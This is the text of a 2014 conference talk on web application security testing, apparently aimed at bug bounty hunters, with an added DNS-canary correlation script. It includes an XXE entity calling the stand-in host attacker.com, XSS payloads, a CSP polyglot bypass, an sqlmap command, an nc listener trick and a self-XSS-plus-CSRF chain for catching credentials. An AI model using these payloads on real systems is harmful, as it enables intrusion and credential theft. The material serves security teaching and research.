Tricks for web application security testing - advanced version
Sergey Belov
Digital Security
OWASP Moscow, 6 Dec 2014
Hey
Work/Activity: bug hunting, speaker
XXE/SSRF detection via DNS
SSRF:
1) Suggest a site
<link to the site>
2) A bot checks the site
3) Instead of an external site, a local address is substituted / the scheme is replaced (file:///)
XXE:
1) XML
<?xml version="1.0" encoding="ISO-8859-1"?>
2) With an entity
<!ENTITY xxe SYSTEM "http://attacker.com" >]>
3) The parser tries to load the entity from the external site
Difficulties in finding it:
1) Is it there or not?
2) Request timing
3) Firewall
4) Other restrictions
DNS leak
The link contains a domain name
->
the domain must be resolved (the query reaches the domain's DNS server)
Instructions
1) Your own server (VPS) – 12.34.56.78
2) Point attacker.com at your own NS servers
NS1: 12.34.56.78; NS2: 12.34.56.78
3) dnschef
4) python dnschef.py -i 0.0.0.0
Real example
They say it follows links in chat...
Scenario 1
1) User 1 -> User 2 http://skype-example.com
2) # cat access.log | grep "skype-example" | wc -l
3) 0
Scenario 2 – DNS
Caught :]
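The DNS-leak check above only answers "did anything resolve?"; to tell which test case caused a lookup, each payload needs its own unique hostname and the nameserver log has to be correlated back. The following is an added example, not code from the talk or from dnschef: it assumes a zone attacker.com delegated to the tester's own server and a simple log format ("<timestamp> <client-ip> <query-name>"), both of which are assumptions; the log lines and test ids are constructed.

```python
"""Correlate DNS-canary lookups with the test cases that issued them.
Fetching http://<token>.attacker.com must first resolve that name, so the
tester's nameserver sees a query even when the HTTP request never arrives
(firewall, timeouts, no body). Log format "<ts> <client-ip> <qname>" is an
assumption, not dnschef's exact output."""
import re
import secrets
from typing import Dict, List

CANARY_ZONE = "attacker.com"  # zone delegated to the tester's VPS in the slides (assumed)

def new_canary(test_id: str, zone: str = CANARY_ZONE) -> str:
    """One unique hostname per test case, e.g. ssrf-2-9f2c1b.attacker.com,
    so a single resolution pins down exactly which payload was fetched."""
    return f"{test_id}-{secrets.token_hex(3)}.{zone}".lower()

LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<qname>[\w.-]+)$")

def fired_canaries(canaries: Dict[str, str], log_lines: List[str]) -> Dict[str, List[str]]:
    """Map test_id -> resolver IPs that looked up its canary name.

    Exact hostname match (case-insensitive, trailing dot stripped), so the
    zone apex, unrelated subdomains and malformed lines are ignored."""
    by_name = {host: tid for tid, host in canaries.items()}
    hits: Dict[str, List[str]] = {}
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        tid = by_name.get(m.group("qname").lower().rstrip("."))
        if tid is not None:
            hits.setdefault(tid, []).append(m.group("client"))
    return hits

# Constructed data: three test cases; only two produced a DNS lookup.
SAMPLE_CANARIES = {
    "xxe-1": "xxe-1-a1b2c3.attacker.com",
    "ssrf-2": "ssrf-2-d4e5f6.attacker.com",
    "chat-3": "chat-3-0a0b0c.attacker.com",
}
SAMPLE_LOG = [
    "2014-12-06T10:00:01 10.0.0.5 xxe-1-a1b2c3.attacker.com.",
    "2014-12-06T10:00:02 10.0.0.5 attacker.com.",
    "2014-12-06T10:00:09 198.51.100.7 CHAT-3-0A0B0C.attacker.com",
    "garbage line",
]
```

The resolver IP recorded per hit is the target's outbound resolver, not the web server itself, which is worth remembering when reporting the finding.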
CSP bypass – js as image
Image == JS file. Gif injector - http://pastebin.com/6yUbfGX5
1) Ability to upload files to domains allowed by the CSP
2) Upload an image<->js polyglot and include it
<script src=".../image.gif"></script>
Recent Chrome versions have learned to block this
CloudFlare – real IP detection
CloudFlare Free, Pro and Business plan:
We do not proxy wildcard records
CloudFlare Enterprise:
For CloudFlare Enterprise customers, we do proxy wildcard records
ping randoOm.victim.com => REAL IP
XSS && urlencode
Web server: ?xss=<script>alert(1)</script>
1) Not all web servers perform urldecode
2) The XSS payload is reflected, but urlencoded
3) The XSS does not fire
4) IE comes to the rescue!
Only after the question mark
And what if...
http://domain.com/path/<xss_here>/etc/
http://domain.com/path/<xss>/etc/
IE Only (v11 inc):
header("Location: http://domain.com/path/<xss>/etc/");
SQLmap
sqlmap -u http://vuln.com/vote.php --data="id=1&hash=2" --eval="import hashlib;hash=hashlib.md5('123'+id+'456').hexdigest()"
(--eval runs the Python snippet before every request; the POST parameters are available as variables, so the hash is recomputed for each injected id)
Tricky situations - bug bounty
Situation #1 – Same Site Scripting
XXXYYYZZZ.target.com => 127.0.0.1
What’s wrong?
External IP – 12.34.56.78, Loopback – 127.0.0.1
Attacker:
1) nc -lv 10024
2) email to [email protected] with <img src=http://xxyyzz.target.com:10024>
Victim:
1) Open email and...
2) Load image with *.target.com cookies! (that's why it is important to know how to set cookies correctly - http://habrahabr.ru/post/143276/)
http://localhost.domain.com:631/<SCRIPT>XSS</SCRIPT>.shtml
XXXYYYZZZ.target.com => 10.0.0.22
http://lab.onsec.ru/2013/07/insecure-dns-records-in-top-web-projects.html
https://hackerone.com/reports/1509 - $100
Situation #2 – Self XSS
XSS only for you – no impact?
Requirements:
1) CSRF for logout O_o
2) CSRF for login o_O
Steps:
1) Save the (self-)XSS for yourself
2) Logout victim
3) Login victim w/ your creds
4) Draw window
5) Catch user's creds!
Google and self-XSS
Share account and attack your victim
Situation #3 – evil HTTP referers
<a href="http://external.com">Go!</a>
In request headers:
...
Referer: http://yoursite.com/
...
But what about external resources on a web page such as images, styles...?
http://super-website.com/user/passRecovery?t=SECRET
...
<img src=http://comics-are-awesome.com/howto-choose-password.jpg>
...
Owner of comics-are-awesome.com knows all _SECRET_ tokens (from the Referer)!
https://hackerone.com/reports/738 - $100
Situation #5 - Content-Security-Policy
CSP only for some browsers! Is it ok?
1) Forks with a different UA
2) Proxy cache
3) Load balancer...
Bug hunter got $100, but...
Fail! Why:
• Partial support in Internet Explorer 10-11 refers to the browser only supporting the 'sandbox' directive by using the 'X-Content-Security-Policy' header.
• Partial support in iOS Safari 5.0-5.1 refers to the browser recognizing the X-Webkit-CSP header but failing to handle complex cases correctly, often resulting in broken pages.
• Chrome for iOS fails to render pages without a connect-src 'self' policy.
• Old FF problems (some versions between XX and YY)
Situation #6 - Usernames
Okay! Let's register usernames such as:
http://website.com/robots.txt
http://website.com/sitemap.xml
...
Situations XXX
• Info disclosure via CSS files (full path disclosure during compilation - file\:\/\/\/applications\/hackerone\/releases\/20140221175929\/app\/assets\/stylesheets\/application\/browser-not-supported\.scss (bug #2221))
• SPF and similar records
• Short tokens
• Pixel flood attack
• CSRF for login/logout!? (hi Michal Zalewski!)
• ... - https://hackerone.com/security?show_all=true
Thanks! Questions?
@sergeybelove